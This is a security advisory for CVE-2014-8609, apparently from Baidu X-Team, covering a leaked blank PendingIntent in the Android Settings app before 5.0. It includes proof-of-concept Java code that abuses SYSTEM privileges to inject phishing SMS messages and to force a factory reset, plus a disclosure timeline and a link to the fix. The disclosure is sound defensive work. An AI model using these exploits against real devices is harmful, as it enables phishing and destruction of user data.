INTRODUCTION
==================================
In Android <
5.0
(and maybe >=
4.0
), Settings application leaks Pendingintent with a blank base intent (neither the component nor the action is explicitly set) to third party application, bad app can use
this
to broadcast intent with the same permissions and identity of the Settings application, which runs as SYSTEM uid. Thus bad app can broadcast sensitive intent with the permission of SYSTEM.
DETAILS
==================================
The vulnerability exists in the AddAccountSettings.java in the Settings app:
https:
//android.googlesource.com/platform/packages/apps/Settings/+/android-4.4.4_r2.0.1/src/com/android/settings/accounts/AddAccountSettings.java
In the method addAccount, a PendingIntent is created by getBroadcast, the problem here is both the action and the component are not explicitly set:
private
void
addAccount(String accountType) {
Bundle addAccountOptions =
new
Bundle();
mPendingIntent = PendingIntent.getBroadcast(
this
,
0
,
new
Intent(),
0
);
addAccountOptions.putParcelable(KEY_CALLER_IDENTITY, mPendingIntent);
addAccountOptions.putBoolean(EXTRA_HAS_MULTIPLE_USERS, Utils.hasMultipleUsers(
this
));
AccountManager.get(
this
).addAccount(
accountType,
null
,
/* authTokenType */
null, /* requiredFeatures */
addAccountOptions,
null,
mCallback,
null /* handler */
);
mAddAccountCalled =
true
;
}
This PendingIntent is then stored in the addAccountOptions, which will be sent to another application.
According to android developer guides,
this
is not secure: (see http:
//developer.android.com/reference/android/app/PendingIntent.html)
"By giving a PendingIntent to another application, you are granting it the right to perform the operation you have specified as if the other application was yourself (with the same permissions and identity). As such, you should be careful about how you build the PendingIntent: almost always, for example, the base Intent you supply should have the component name explicitly set to one of your own components, to ensure it is ultimately sent there and nowhere else."
The bad app can register as an account authenticator by writing a service with the following intent filter (no permission is needed):
<intent-filter>
<action android:name=
"android.accounts.AccountAuthenticator"
/>
</intent-filter>
Then bad app can send an intent to Settings app and request Settings app to add account of requested account type:
Intent intent =
new
Intent();
intent.setComponent(
new
ComponentName(
"com.android.settings"
,
"com.android.settings.accounts.AddAccountSettings"
));
intent.setAction(Intent.ACTION_RUN);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
String authTypes[] = {AccountGeneral.ACCOUNT_TYPE};
intent.putExtra(
"account_types"
, authTypes);
startActivity(intent);
Upon receiving such an intent, Settings app will (automatically) call the method addAccount (whose vulnerability is explained as above) and sent the pendingIntent to bad app's addAccount method.
Since the pendingIntent's actions and components are blank, bad app can fillin arbitrary action and extra information into
this
intent and resending
this
pending intent, with the permission of SYSTEM.
For example, bad app can create a phishing SMS in the phone with the following POC:
public
Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options)
throws
NetworkErrorException {
...
PendingIntent pendingIntent = (PendingIntent)options.getParcelable(
"pendingIntent"
);
Intent newIntent =
new
Intent();
newIntent.setAction(
"android.provider.Telephony.SMS_RECEIVED"
);
//filling phishing sms pdu data
newIntent.putExtra(
"pdus"
,
new
Object[] { pdu });
newIntent.putExtra(
"format"
,
"3gpp"
);
try
{
pendingIntent.send(mContext,
0
, newIntent,
null
,
null
);
}
catch
(CanceledException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
Or force the phone to factory reset to delete user's data with the following POC:
public
Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options)
throws
NetworkErrorException {
PendingIntent test = (PendingIntent)options.getParcelable(
"pendingIntent"
);
Intent newIntent2 =
new
Intent(
"android.intent.action.MASTER_CLEAR"
);
try
{
test.send(mContext,
0
, newIntent2,
null
,
null
);
}
catch
(CanceledException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
This has been fixed in android
5.0
(android bug id
17356824
)
https:
//android.googlesource.com/platform/packages/apps/Settings/+/f5d3e74ecc2b973941d8adbe40c6b23094b5abb7
TIMELINE
==================================
02.09
.
2014
Initial report to Android Security Team with the phishing SMS POC
03.09
.
2014
Reply from Android Security Team
"opened an internal inquiry about this"
09.09
.
2014
Find a
new
factory reset POC and notify Android Security Team
10.09
.
2014
Reply from Android Security Team
"We do acknowledge the issue"
04.11
.
2014
Android
5.0
source code is open, the fix
for
this
issue is found in change log, ask Android Security Team when
this
can be published
09.11
.
2014
Contact MITRE about
this
issue
20.11
.
2014
CVE-
2014
-
8609
assigned
25.11
.
2014
Got Permission from Android Security Team to publish
this
26.11
.
2014
Public Disclosure
IDENTIFIERS
==================================
CVE-
2014
-
8609
Android id
17356824
CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team
--
BAIDU X-TEAM (xteam.baidu.com)
An external link of
this
advisory can be found at http:
//xteam.baidu.com/?p=158